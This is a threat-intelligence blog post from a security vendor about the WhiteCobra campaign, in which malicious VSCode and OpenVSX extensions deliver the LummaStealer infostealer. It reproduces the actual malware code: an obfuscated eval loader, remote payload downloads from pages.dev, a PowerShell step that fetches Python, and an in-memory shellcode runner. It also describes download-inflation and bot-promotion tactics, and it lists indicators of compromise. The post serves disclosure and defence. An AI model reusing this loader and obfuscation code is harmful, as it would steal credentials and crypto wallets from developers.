A new wave 24 of malicious extensions targeting VSCode, Cursor and Windsurf users have infiltrated the VSCode and OpenVSX marketplaces over the past month, and now we now know exactly how they did it.

Today we unveil a coordinated campaign by a threat actor group nicknamed WhiteCobra, that we’ve been tracking for over a year. This is the same group behind the $500K crypto theft revealed two months ago, a slew of malicious extensions published on the VSCode and OpenVSX marketplaces in 2024 and 2025, and now they're back with evolved tactics.

We’ve managed to recover their playbook, today we get an extremely rare glimpse inside the operation of a sophisticated threat actor group active for multiple years. Koi managed to recover a detailed deployment plan that reveals WhiteCobra’s infrastructure, promotional strategies, and shocking revenue projections.

This new wave of malicious extensions has already claimed a high-profile victim. Crypto influencer zak.eth had his wallet drained by WhiteCobra’s malicious Cursor extensions, an incident that garnered over 2 million views on X.

zak.eth is not just any victim, he is a security professional with a decade of security experience, hinting on the level of sophistication these attacks have achieved. While we've reported this new wave and since then they've been taken down, WhiteCobra continues to upload new malicious extensions on a weekly basis, including just this week. Making zak.eth far less likely from being the last victim.

Let’s break down how WhiteCobra went from sloppy PowerShell miners to stealthy MacOS-compatible crypto stealers, why their old trick of installs inflation still makes them look legitimate, and how their multi-stage payload delivery works under the hood.

The $500K/Hour Plan: Inside WhiteCobra's Leaked Playbook

We managed to recover a markdown file titled "DEPLOYMENT PLAN: Operation Solidity Pro", and just like the movies it reads like a criminal business plan.

While we’ll now break down their detailed plan step by step, we’ve included a censored version of this smoking gun along this blog post, removing the technical details that will allow replication of these attacks.

The document begins with cold calculations of potential revenue:

• Low Estimate: $10,000/hour (targeting select high-value wallets)
• High Estimate: $500,000/hour (widespread infection hitting "whale wallets")

But the revenue projections are just the beginning. The playbook provides a complete blueprint for weaponizing the VS Code extension ecosystem.

Their 5-Phase Attack Strategy

• ‍Phase 1: Packaging - Instructions for creating the malicious VSIX file
• ‍Phase 2: Deployment - Steps to upload to OpenVSX with "convincing details"‍
• Phase 3: Promotion - Social media templates and bot engagement tactics
• ‍Phase 4: Inflation - Automated scripts to generate 50,000 fake downloads for "social proof"
• ‍Phase 5: Exfiltration - Real-time monitoring of stolen seed phrases and immediate fund transfers

The document even includes the wallet address where stolen funds should be sent and specific instructions for setting up command & control infrastructure, complete with ScreenConnect backdoors on port 8041.

Fake Downloads: Manufacturing Trust at Scale

One of the most damaging revelations from the playbook is their systematic approach to faking credibility: "Let the script run until the target of 50,000 downloads is reached. This will provide social proof for developers discovering the extension" (Directly quoted from their manual). In practice we see that malicious extensions often have much higher number than that. To really see how confusing it can be, take a good look at the following screenshot and try to guess - which is the real Solidity extension and which is the malware?

If you guessed #1 with 108K downloads was legitimate, congratulations! you have just installed malware. The #2 extension with 64K downloads is actually legitimate, but the malicious version has inflated its numbers to appear even more trustworthy. This is exactly how zak.eth and countless other developers got compromised, the fake often looks more real than the real thing.

The playbook continues by detailing their download inflation strategy, including:

• Procurement of "thousands of high-quality residential proxies"
• Python scripts (download_bot.py) to automate the inflation
• Instructions to run the bot immediately after deployment to create instant credibility

By faking massive numbers of downloads, they continue to trick developers, and sometimes even marketplace review systems, into thinking their extensions are safe, popular, and vetted. To a casual observer, 100K installs signals legitimacy. That’s exactly what they’re counting on.

Social Engineering at Scale: The X (Twitter) Campaign

The playbook includes pre-written social media templates and a sophisticated promotional strategy. Their posts are crafted to exploit developer psychology:

Notice the manipulation tactics:

• Artificial urgency ("Don't get left behind", "Don't be the last to join")
• Fake social proof ("50,000+ developers switched" - the same fake downloads they generated)
• Aggressive positioning ("Hardhat is dead", "they don't want you to have")
• FOMO triggers targeting developer insecurities about using "outdated" tools

The playbook instructs operators to:

• Use "high-reputation X accounts" styled after known developer influencers
• Stagger posts over 2-hour periods to simulate organic discovery
• Deploy bots to "like, retweet, and comment on relevant developer conversations"

This coordinated social media manipulation explains how these malicious extensions gain traction so quickly. By the time real developers start discussing them, the conversation has already been seeded with fake endorsements and artificial buzz.

Technical Deep Dive: WhiteCobra’s Payload Delivery Chain

White Cobra’s operation isn’t just persistent - it’s technically layered, obfuscated, and intentionally evasive. Let’s walk through the extension’s execution flow and unpack how the final malicious executable is delivered and run, cross-platform.

This isn’t your typical script kiddie setup - it’s a carefully staged, platform-aware infection chain.

Let’s analyze one of the extensions (they are practically the same) the threat actor uploaded to OpenVSX - “solidity” by “juan-blanco” (the legitimate extension is the same name by “juanblanco”)

It’s going to be a multi-stage fun with the actual obfuscated and deobfuscated malicious code snippets, so buckle up!

Stage 1: Execution Begins from extension.js

At first glance, the extension’s main file “extension.js” looks completely harmless. In fact, it’s nearly identical to the default “Hello World” boilerplate that comes with every VSCode extension template. There’s no suspicious logic - just a clean, minimal setup. The only additional functionality is the call for “ShowPrompt” function from “./utils/prompt”.

const vscode = require("vscode");
const { ShowPrompt } = require("./utils/prompt");

// This method is called when your extension is activated
// Your extension is activated the very first time the command is executed

/**
 * @param {vscode.ExtensionContext} context
 */
function activate(context) {
  // Use the console to output diagnostic information (console.log) and errors (console.error)
  // This line of code will only be executed once when your extension is activated
  console.log("Congratulations, your extension is now active!");
  const result = ShowPrompt();
  . . .

This simple call hands off execution to the prompt.js file - the true entry point of the attack chain. By isolating malicious behavior in a secondary script, the threat actor avoids triggering red flags during static reviews or automated scans that only check the primary file.

The ShowPrompt() function hides additional code that is executed using eval:

const translationsArr = [
    . . .
    "tcG$Rpcj1hc3lu",
    "e2NvbnN$0IHR",
];

  // Small helper function to show prompt
function ShowPrompt() {
  // Get global store for singleton
  const globalStore = globalThis;
  // Get singleton
  const singletonFunc = globalStore[atob("Z&X&Z&h&b&A&=&=&".replaceAll("&", ""))];
  singletonFunc(atob(translationsArr.reverse().join("").replaceAll("$", "")));
}

The eval is hiding in here- "Z&X&Z&h&b&A&=&=&" -> "ZXZhbA==" -> “eval”

The resulted script downloads the next stage from Cloudflare’s pages.dev based on the platform

if (!["win32", "darwin"].includes(process.platform)) return;
. . .
eval((await download(
      process.platform === "win32" 
        ? "https://g83u.pages.dev/hjxuw1x.txt"
        : "https://g83u.pages.dev/qp5tr4f.txt"
    )).toString());

Stage 2: Platform specific payload

Let’s dive into the Windows payload - it uses the same trick to hide the eval call and has base64 encoded script:

const anil6 = globalThis;
const airf3 = anil6[atob("Z$X$Z$h$bA$=$=$".replaceAll("$", ""))];
airf3(atob("e2N(vbnN(0(IGk9(YXN5bmMgdD0+e2xl(d(CAkPWF3YWl0(IGltcG9y( . . .

The encoded script is as follows:

{const i=async t=>{let $=await import("path"),a=await import("os");return $.join(a.tmpdir(),t)};(async()=>{let t=await import("child_process"),$=await import("fs"),a=await import("path"),e=await i("abwgfrf"),c=a.join(e,"python.exe"),o=await i("ufqk6i6"),s=`$zip = "${e}.zip"; $dest = "${e}"; $wc = New-Object System.Net.WebClient; $wc.DownloadFile("https://www.python.org/ftp/python/3.12.8/python-3.12.8-embed-win32.zip", $zip); New-Item -Path $dest -Force -ItemType Directory; Add-Type -AssemblyName System.IO.Compression.FileSystem; [IO.Compression.ZipFile]::ExtractToDirectory($zip, $dest); Remove-Item -Path $zip -Force;`;$.existsSync(c)||t.spawnSync("powershell.exe",["-Command",s],{stdio:"ignore",windowsHide:!0}),$.existsSync(c)&&($.writeFileSync(o,`aaclo = lambda s, r: s.replace(r, "")[::-1]
atvqe = globals()[aaclo("_&_&s&n&it&l&i&u&b&_&_", "&")]
aks5y = atvqe.__dict__[aaclo("r)t)t)a)t)eg)", ")")]
av3np = aks5y(atvqe, aaclo("_*_*t*r*o*p*m*i*_*_*", "*"))
a6t0x = aks5y(av3np(aaclo("46#e#s#a#b#", "#")), aaclo("e(d(o(ce(d(4(6(b(", "("))
aebbg = aks5y(av3np(aaclo("bi^l^z", "^")), aaclo("s&s&e&r&pm&oc&e&d&", "&"))
asd_d = aks5y(av3np(aaclo("s!nitl!iu!b!", "!")), aaclo("c#exe#", "#"))
asd_d(aebbg(a6t0x(aaclo("gxyb+$/Q8$K$QZnG/$XM$AvST0MVypXsVkeq$aVzh$vBz$OCBU$K$O$k9Na5IXnVIzkyq6RU$pTsd+$UyFgWb7W1stp/21qOj1120F9m8E$imKC$W7Qmcz$uuLRE$U/gpu+atIo+eTXEUpPXddo$X1$rVTrfh0jkWC0nYf6+k7n+3t$Sg/cO$YCDHhdpw+$p$s$Gb$IM$xbX2$7$h$TvnHwbPvn$w+3XpPR/X40Pofdt$aXrFuYD12ew7$2Mj/$gon5K$8$++A$p8XCE39A$Z7Kr$Qw$HbA1P$z1$g$9p+A7rE$/C1X$7PN5dRWj/r3uz6z/ygH$GQ$6LRcMs3TW$ObzI$8K3JGZdZBzdzND$H$Sq7TrhHG8pk2zlHT$9$ge4aJM$qh$GEwHrH$0Td$3B+IA$/yw$YOnHmL2hahXljt7CNRwfYP0$4qiaGd4KlnX51V7zjVMlE$hCFw$WOgx2XmSIh$kEfMC2OSoQxBAjIML0IC7X$lZ4kFLSfMNN7uPNm$dZPtt1j1$zF1$6h$kCBNnh9k$IoTXDMBGG9qzAwdjq$LP9ESo9Yr$fAHKFTcHxwL80$5SxP83LKZ1P97$9u$7hk$uhoa$u54IIXixYNofaj5Zc3f0t7$3$LioLnQJn$I$D5sDTeSF779$My12bHOQQN9hKB$ZjNUF2/$K0$3KU9TQlj$hau6S$9drgfEK47V8$mhpyBucrhIQE$lwZJJcHI$pTS$igwk8EVx1$u48si87m$mfr8Hy/I+5Rq$L6W$IIqi723ugczyI3RJ$dp$IOQS/DoJK$9$Fy$uMA1$HgW$KbBdZRIeXIHxRe$+31XE$YX8N5$NC3ZacaGputAsCREhMc9hwQH$LnlRY$fvgL$GqK5vYR$+QOQj$qasEzBv7UdqAlMQeW7r5i$2W$k9$xrL15SaERSgSE7DSy$Vo/wN/j5r$42$2E9RrBhS4EdchHzD2JNRhwC$8UvktzEXcnpORlbd5wwP3aQQrHm42gRZd5$eja+q$LzJ75X6lTQo0uFg$evn$22$325YFs6uuy$dcMc68D$PckjbB$d$ta2jX$tF$nzNSNZ78bcX$V/zP8Nn6NWV$a8XT$5X$371Z3$jgvzszPq7cql$UBNeG$ri8hv8wHZ$o8$8SP9$tWq$cxe5G$SHu$b7q$c/wNBdHlF$u5bdlq1N649$D0d1ZY65f460btZlvv$q$WWeul5ilhN4VX/t$3$oCbcHqPPhnpLYQz8$CwFv+fx99qr1rf7$Rc$6U/RdP9$hVnNM$4N$L08x$3S9zxf9BM74peTe0wn9E$U$8H3995ctUy$slchXc$27I2z+$yXdPmdK7ymL$1cz6Jk/X$zYS7$IXbHt+cE/$jX2JH7tmGmUcfd$cnXN+tuC$ga8hkXCVPMBc$9YdaY$PGXD2$xam7kqc8Vgg36$KtT$T$UVRQogzHNQJ$HkOwqQS6U0$jH5oqAOS$QJI$HHDtttPYI$63$tsDsg9okqFQdc$CR1hZ$AiKdZBnmRRoLgIcX$L5v7$nm+D$7eh2ZnpNJxwt$dv/WclsI+Q0$4ttdJ$Ukq$kh5IEIkxcs5xl$F$AnjrUU7bG8$TH+5xQgj4zl1$k9x$Je", "$"))))`),t.spawn(c,[o],{shell:!0,windowsHide:!0}),setTimeout(()=>process.exit(),2e3))})().catch(()=>0)}

Looks complicated... Let me deobfuscate it a bit and show what it really does:

{
    const createTmpDir = async t => {
        let path= await import("path"), os=await import("os");
        return path.join(os.tmpdir(),t)
    };
    
    (async() => {
        let child_process=await import("child_process"),
        fs=await import("fs"),
        path=await import("path"),
        tmpDir1=await createTmpDir("abwgfrf"),
        resultPythonPath=path.join(tmpDir1,"python.exe"),
        tmpDir2=await createTmpDir("ufqk6i6"),
        powershellCommandInstallPython=`
            $zip = "${tmpDir1}.zip";
            $dest = "${tmpDir1}"; 
            $wc = New-Object System.Net.WebClient; 
            $wc.DownloadFile("https://www.python.org/ftp/python/3.12.8/python-3.12.8-embed-win32.zip", $zip); 
            New-Item -Path $dest -Force -ItemType Directory; Add-Type -AssemblyName System.IO.Compression.FileSystem; 
            [IO.Compression.ZipFile]::ExtractToDirectory($zip, $dest); 
            Remove-Item -Path $zip -Force;
            `;
        fs.existsSync(resultPythonPath) || child_process.spawnSync("powershell.exe",["-Command",powershellCommandInstallPython],{stdio:"ignore",windowsHide:!0}),
        fs.existsSync(resultPythonPath) && (fs.writeFileSync(tmpDir2,`
        builtins = globals()['__builtins__']
        getattr = builtins.__dict__['getattr']
        import = getattr(builtins, '__import__')
        base64_b64decode = getattr(import('base64'), 'b64decode')
        zlib_decompress = getattr(import('zlib'), 'decompress')
        exec = getattr(import('builtins'), 'exec')
        exec(zlib_decompress(base64_b64decode('eJx9k1lz4jgQx5+HT8Gb7UUrjnAFlx5scxkIEI5hkqkUJdtt40Q+IslcW/vdtwxJNpnZ2he7D+mn7v5LXcIgLoRRmnBZdKiAZh1RCcdQFqko9gsDst36IYPtttDHHIJQSOAqo5Hj0U6SQqwOkHJQNHzgoQRVUTTtK63ggV8cqk7max2DXGPYadY9cBMPVCXkh8agCut+NXncdfcUmGmt7HJ2Xj/Ec+tHbXI7SYzX/kJ6zc1Lmy7KdmPdXy+z2I72cXhclsyUtc5993H8UE9nw0eTep47MB9fxz9S3x80LN4MNnVh9PdR/U6cR7fr1rq99xf+vFwC8zQYLpnhPPqHcbCo3t/XV4Nhli5lueWWqvvlZtb064f56YZ1d0D946N1qldb5uFlHdBNw/cq7buHSG5excqWt9PS88oZHw8vh8irGeNBUlqc7qPzszvgj3Z173X5TX8aVWN6nN8Pz/VXcb87ZNSNznFtXj2atdBbjkcPD86cMcdyuu6sFY52322nvegFu0oQTl6X57JzLq+aje5dZRg24mHrQQa3Pww5dblROpncXEztkvU8CwhRNJ2DzHhcdE4ShBrR9E224r5j/Nw/oVySD7ESgSREaS51Lrx9kW2i5r7WeQMlAqdU7vBzEsaqjQOQ+RYv5KqGLgvfYRlnLHQwh9cMhERCsAtupGacaZ3CN5N8XYEX13+eRxHIXeIRZdBbKWgH1AMuyF9KJoD/SQOIpdJR3Iyzcgu327iqIIW6LqR5+I/yH8rfmm78is84u1xVE8kwgiSTpIHcJJZwlEQIhrcuByphm8V74KEfgrd9S6uahjlQT9UK30K/2FUNjZBKh9NQQOHb21yM977FSeTDs5DInJQnLoiL37t0f3cZ5jafoNYxiXII45uaohukh7u979P1ZKL38PxS508LwxHcTFKHAfrY9oSE9PLqjdwAzq9GGBMDXToIk9hnNBCkh61Fz1j1ttPZdmNPu7NNMfSLFk4ZlX7CI0LMIjABxQoSO2CMfEkhISmX2xgOWwFChElMVjz7V15XnlK4dGaiq40PYfwRNC7tjlXhah2LmHnOYwy/AI+B3dT0HrHwEGhqMJa4eg9THlz2kp8GHhrT7qSHDNzdzBZdZGJ3K8IzbOWT3sMcRL6QGHgy/z6zu3r/jWRd5NP7X1C/Er7A+p9g1zP1AbHwQrK7ZA93ECX8pA++8K5nog/jM27we21DYuFrXatdfoP04X/RPpX3+wnvPbwHnvTh72XbxMIbGsp+wpdhHDCYOc/gSt3+n7k+6fYn0CWkj0hfrTVr1XoddXPpUEXTe+oIta+upg/UERLuuzcmQ7WCKmiE8m9F0211jOq12/pts1W7bWgFyU+dsTpUR6qykzIVnXI5aN9kOKUBCOzBvhzVaqekVsXpyVM0TSvAMX/GnZQK8Q/+byxg')))`),
        child_process.spawn(resultPythonPath,[tmpDir2],{shell:!0,windowsHide:!0}),
        setTimeout(()=>process.exit(),2e3))}
    )().catch(()=>0)
}

Oh! So it simply uses Powershell to download python, and then executes encoded python script!

The python script downloads from pages.dev a file with “pyd” extension (that has nothing to do with pyd file), decrypts it using a hardcoded substitution key, and executes the downloaded shellcode directly in the memory:

def Decrypt(buf):
	key=base64.b64decode('irw5G1eUF1oZhDvaelBCTI/uzUYnPCX2L9LoAqFRtd6Wk8aR/I5UFUSunImvnixS+Bpl7zFcZKY4pOHZBaddcGBZqKXpffG5Cr6gW4sAFvm4MszJ9U7U8vfRfP/+eByGHSlAbZfwKgR1QQ4TGHupSt/7c+1vSWO6f4wPy3lDheafxZCy417BwkUgaW5fd08MYmtWqsTIt9N+jTbKxwkwmd2AKGo+RyQmzjcGrZI1vdDr3FNm1naxPQHz4qsQhwuacmzn2P1xB2idSKJYYbPllbCbDcO7iJhVIb8REgh0giLqSz/bz/T65DM0Hi5nH7Ytg9XAtNcrA+yBrBRNI+CjOg==');
	return bytes(map(lambda v:key[v],buf))
  
def ExecuteInMemory(shellcode):
	winkernel32=ctypes.windll.kernel32;
	HeapAlloc=winkernel32.HeapAlloc;
	HeapAlloc.argtypes=[wintypes.HANDLE,wintypes.DWORD,ctypes.c_size_t];
	HeapAlloc.restype=A.LPVOID;
	HeapCreate=winkernel32.HeapCreate;
	HeapCreate.argtypes=[wintypes.DWORD,ctypes.c_size_t,ctypes.c_size_t];
	HeapCreate.restype=wintypes.HANDLE;
	RtlMoveMemory=winkernel32.RtlMoveMemory;
	RtlMoveMemory.argtypes=[wintypes.LPVOID,wintypes.LPVOID,ctypes.c_size_t];
	RtlMoveMemory.restype=wintypes.LPVOID;
	CreateThread=winkernel32.CreateThread;
	CreateThread.argtypes=[wintypes.LPVOID,ctypes.c_size_t,wintypes.LPVOID,wintypes.LPVOID,wintypes.DWORD,wintypes.LPVOID];
	CreateThread.restype=wintypes.HANDLE;
	WaitForSignalObject=winkernel32.WaitForSingleObject;
	WaitForSignalObject.argtypes=[wintypes.HANDLE,wintypes.DWORD];
	WaitForSignalObject.restype=wintypes.DWORD;
	HeapCreate2=HeapCreate(262144,len(shellcode),0);
	HeapAlloc(HeapCreate2,8,len(shellcode));
	RtlMoveMemory(HeapCreate2,shellcode,len(shellcode));
	NewThread=CreateThread(0,0,HeapCreate2,0,0,0);
	WaitForSignalObject(NewThread,4294967295)

ExecuteInMemory(Decrypt(FetchFromURL('https://g83u.pages.dev/m22yo21.pyd')))

Stage 3: Shellcode executable

The shellcode executes a PE executable - LummaStealer (a commercial info-stealer) that steals crypto information and more from the machine.

We analyzed it and discovered that it looks for many different services in the machine:

• Cryptocurrency wallets and information

• Connection Services like anydesk, VPNs and VNC

• Cloud Infrastructure

• Messaging platforms

• Password Managers

• Wallet & Password management Browser extensions

During it's execution, it communicates with the following C2 servers:

• Iliafmoj[.]forum
• mastwin[.]in

Final Thoughts

WhiteCobra's leaked playbook reveals more than just their tactics. It exposes the industrialization of extension-based attacks. With documented processes, automated tools, and revenue projections treating victims as mere numbers, this isn't hacking; it's a business operation.

While we've reported these 24 variants and they've been taken down, WhiteCobra continues uploading new malicious extensions on a daily basis. The playbook shows they can deploy a new campaign in under 3 hours, from packaging to promotion to profit.

This growing gap between attacker sophistication and developer defenses is the real danger. Threat actors like WhiteCobra are operating with industrialized precision, while everyday developers have almost no reliable way to tell safe tools from malicious ones. Marketplace ratings, download counts, and even official reviews can all be manipulated, leaving even seasoned professionals vulnerable. Without better mechanisms for trust and verification, the advantage remains firmly on the side of the attackers.

Koi was built to solve this problem. Our platform gives practitioners and enterprises the ability to uncover, evaluate, and control what their teams bring in from ecosystems like VS Code, NPM, Chrome Web Store, Hugging Face, Homebrew, and beyond. Today, some of the world’s largest banks, Fortune 50 companies, and leading technology firms rely on Koi to automate the processes that bring visibility, establish governance, and proactively shrink this expanding attack surface.

If you want to see how it works — or if you’re ready to take action — book a demo or reach out to us.

We’ve got more to share soon, so stay tuned.

IOCs

Extension IDs:

Open-VSX (Cursor/Windsurf)

• ChainDevTools.solidity-pro
• kilocode-ai.kilo-code
• nomic-fdn.hardhat-solidity
• oxc-vscode.oxc
• juan-blanco.solidity
• kineticsquid.solidity-ethereum-vsc
• ETHFoundry.solidityethereum
• JuanFBlanco.solidity-ai-ethereum
• Ethereum.solidity-ethereum
• juan-blanco.solidity
• NomicFdn.hardhat-solidity
• juan-blanco.vscode-solidity
• nomic-foundation.hardhat-solidity
• nomic-fdn.solidity-hardhat
• Crypto-Extensions.solidity
• Crypto-Extensions.SnowShsoNo

VS Code

• JuanFBlanco.awswhh
• ETHFoundry.etherfoundrys
• EllisonBrett.givingblankies
• MarcusLockwood.wgbk
• VitalikButerin-EthFoundation.blan-co
• ShowSnowcrypto.SnowShoNo
• Crypto-Extensions.SnowShsoNo
• Rojo.rojo-roblox-vscode

Network IOCs:

• https://g83u.pages[.]dev/hjxuw1x.txt
• https://g83u.pages[.]dev/qp5tr4f.txt
• Iliafmoj[.]forum
• mastwin[.]in
• niggboo[.]com

File Hashes:

• 1a728a7b7f68a71474a6a04f92960b18aae45ae5d00ea9a1d88174f8bd4ffa10 - Mac ARM executable
• 89848e8a1c8840a0561fcae2948b5941ed55a53474298007d7272f391b28c1b9 - Mac ARM executable
• fa078483566de02cb64d970d06aa82470beee4c665cfee6915968cb0adb2c6c4 - Mac Intel executable
• 39459ad404c9f0ad361d82b9f96d60f13a9281d3746ada4ef8675dd80fcb9a7e - Mac Intel executable
• e8ce84a6e84d4bb0ee50dcde0a72dab9f2e6a2c2f80eeab4df243d5eaaa57a6f - Windows Shellcode
• 99b976ff0908b03d277bc96d0010b0f1aef8ae1529b753c645c57b7399760a51 - Windows Shellcode
• 22350ef4cdee6af4cbe7809f98256dbfd882dab08ea51ab14880d5da9ce9c06d - Windows LummaStealer
• 118b10295fea2613f72bc89074db9ab82a57c44ab7f62bddb3a86a4ed87f379f - Windows LummaStealer

‍